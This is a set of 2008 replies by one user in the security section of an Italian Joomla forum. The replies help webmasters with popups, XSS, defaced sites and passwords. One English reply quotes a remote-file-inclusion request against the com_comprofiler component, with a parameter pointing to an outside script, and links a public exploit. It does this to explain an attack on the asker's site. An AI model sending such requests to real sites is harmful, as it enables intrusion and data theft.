Post

21

Sicurezza / Re: Strane finestre popup

« il: 11 Nov 2008, 18:07:30 »

Che io sappia guide per joomla non credo esistano...Per il database puoi usare la funzione "cerca" del phpmyadmin, prova a fare qualche ricerca sui tag che possono iteressare la creazione di finestre popups.
Inoltre ti consiglio di scaricare un debugger per javascript, esiste un plugin per firefox fatto molto bene, te lo linko:

_http://www.hacksrus.com/~ginda/venkman/

Con il debugger sarai in grado di identificare lo script che genera la popup.

Se hai problemi fammi sapere. bye

22

Sicurezza / Re: Bug da fixare in joomla v1.5.7

« il: 11 Nov 2008, 18:00:36 »

Ciao,
prova a mandarmi il report anche se sono quasi sicuro che i risultati sono dei falsi positivi.

23

Sicurezza / Re: Strane finestre popup

« il: 10 Nov 2008, 00:19:26 »

Ciao,
i casi in cui ciò può accadere sono 2; ho ai uno spyware che ti genera le popups oppure qualche cross site script (xss), hai provato a sostituire i file core del joomla? hai controllato sul database se c'è qualche script malizioso?

24

Sicurezza / Re: 1.5.2 Portale violato.... come posso fare?

« il: 04 Nov 2008, 15:15:39 »

Installare l'ultima versione.c

25

Sicurezza / Re: Grosso problema Jsecure - Urgente

« il: 04 Nov 2008, 15:15:10 »

ciao,
premetto che non conosco quel plugin però se hai accesso all'ftp e al phpmyadmin puoi fare quello che vuoi... cancelli tutti i file del plugin e anche le rispettive tabelle dal database. Cmq prima di fare ciò documentati.

26

Sicurezza / Re: Virus

« il: 02 Nov 2008, 19:53:48 »

ciao,
per prima cosa devi trovare il "virus", probabilmente sarà qualche riga di javascript, è anche possibile che non ci sia nulla di pericoloso, spesso le protezioni web e av non sono molto precise. Se non trovi nulla puoi provare con un debugger per javascript, c'è un plugin gratuito per ff, inoltre ricordati di cercare anche nel database. Spesso questi "virus" sono dei xss un po elaborati per maggiori info vedi qui:

_http://stacktrace.it/2008/08/xss-depth/

spero ti torni utile. bye

27

Sicurezza / Re: Cambiare password accesso al DB

« il: 02 Nov 2008, 19:43:00 »

Questo ti dice niente?

mysqladmin -u root -p vecchia_psw nuova_psw

28

Sicurezza / Re: Nuovo sito con dati sensibili

« il: 02 Nov 2008, 03:02:13 »

ciao, credo che la risposta sia paradossale, joomla è uno dei cms di maggiore successo quindi ha una visibilità sulla rete superiore ai suoi antagonisti, ciò lo rende più appetibile ad attacchi ma allo stesso tempo lo rende più sicuro, prendi esempio da Mozilla Firefox. Questa discussione appare di tanto in tanto qua e la nella rete e la risposta è sempre la stessa. La sicurezza di un sito non nasce dal cms ma dal webmaster. Esistono parecchi modi per rendere sicuro il tuo sito ma lo strumento più importante sei tu.

29

Sicurezza / Re: sito HACCKATO! AIUTO!!!

« il: 07 Ott 2008, 12:05:38 »

ciao,
il forum è attivo, infatti se prima di postare avessi letto qualche messaggio in questo forum, avresti già risolto il tuo problema.

30

Sicurezza / Re: TEST di sicurezza

« il: 05 Ott 2008, 18:20:46 »

ciao,
i test di sicurezza si possono fare mediante programmi che testano le vulnerabilità conosciute, vedi acunetix web vuln scan. oppure, cosa che consiglio è imparare a trovare le vulnerabilità, so che non è facile, soprattutto per quelli alle prime armi, cmq con un po di pratica si riesce a coprire ogni falla.
Per capire come ragiona un hacker devi essere tu stesso come loro.

31

Sicurezza / Re: SITO HACKERATO

« il: 05 Ott 2008, 18:17:13 »

inoltre leggi questo post.

http://forum.joomla.it/index.php/topic,50464.0.html

32

Sicurezza / Re: Rendere il vostro joomla sicuro al 99.9%

« il: 05 Ott 2008, 18:16:07 »

ciao,
per qualsiasi problema potete contattarmi su msn locutus@uptm.org, così facciamo prima. Cmq in questi giorni preparerò un videotutorial che mostra come applicare lo script. Abbiate pazienza.

PS
pregherei i moderatori di fare uno sticky con questo post.

33

Sicurezza / Re: Mi hanno hackerato il sito

« il: 04 Ott 2008, 20:22:54 »

No, basta che uppi tutto sul server. cmq è buona cosa controllare tutti i files, quello che ti ha defacciato il sito potrebbe averti inserito una shell.

34

Sicurezza / Re: Mi hanno hackerato il sito

« il: 04 Ott 2008, 16:30:10 »

Ciao,
aggiorna tutto alla versione 1.5.7 poi segui questo post:

http://forum.joomla.it/index.php/topic,50464.0.html

bye

35

Sicurezza / Re: L'antivirus di un mio amico gli segnala che sul mio sito c'è un virus!

« il: 03 Ott 2008, 11:34:29 »

Altra soluzione è installare il plugin NoScript pee firefox. Con tale script sei tu a decidere quali script eseguire e quali no.

36

Sicurezza / Re: Hack on Comprofiler (CB 1.1)

« il: 03 Ott 2008, 11:25:54 »

hi,
i think your site is bugged. This type of bugs are called RFI (Remote File Inclusion).
 

/mysitename//index.php?option=com_comprofiler&task=userProfile&user=http://urlcrack.txt

As you can see above the attacker has injected some malicious code into your site through the component "com_comprofiler". I suggest you to purge that component and perform a full check on server files and databases.

Anyway that script doesn't send email. It was used to retrive some info and psw from your server then the hacker has sent the emails using your data.


ps
look at this one:

http://www.milw0rm.com/exploits/5491

bye

37

Sicurezza / Re: Problema pwd amministrator jommla 1.5.6

« il: 02 Ott 2008, 00:02:16 »

ciao,
prima di tutto ti ricordo che è meglio che usi la versione 1.5.7, la 1.5.6 è buggata. Per la passwerod basta che ne inventi una nuova e che la copi nel database in md5.

38

Sicurezza / Re: Sicurezza Joomla

« il: 27 Set 2008, 18:38:33 »

non penso, per editare un file nella root del server devi accedere fisicamente al file,mediante un editor o avere la possibilità di caricare/scaricare direttamente i file (RFI)... tramite una sql injection al massimo puoi modificare e/o vedere i valori/stringhe nei database.

dipende mi pare che spesso dopo un deface si consigli agli utenti di ricaricare il file index.php

Perchè i defacers hanno ottenuto la psw di admin quindi hanno accesso al manager e, di conseguenza, all'editor dei file e alla gestione dei moduli. Quindi come già ho affermato, nel caso di joomla, se un defacer ottiene la psw dell'admin ma il sito è protetto con doppio login il risultato è che il defacer non può far molto. Soprattutto perchè la maggiorparte dei defacer sono dei bambini cretini che non sanno nulla di php e databases. (script kiddies)

39

Sicurezza / Re: attacato il mio sito

« il: 27 Set 2008, 16:14:31 »

Ciao,
prova questo come hosting:

http://www.000webhost.com/

è gratuito 250 mb + MySql e altri servizi (si hai capito bene) tutto free!!! Io ho parecchi siti hostati su 000webhost.

40

Sicurezza / Re: Sicurezza Joomla

« il: 27 Set 2008, 16:12:04 »

mmm... non credo sia un'ipotesi plausibile, il defacer o chicchessia, può solo andare a modificare i valori nel db, senza a vere accesso alla root del server. Correggimi se sbaglio.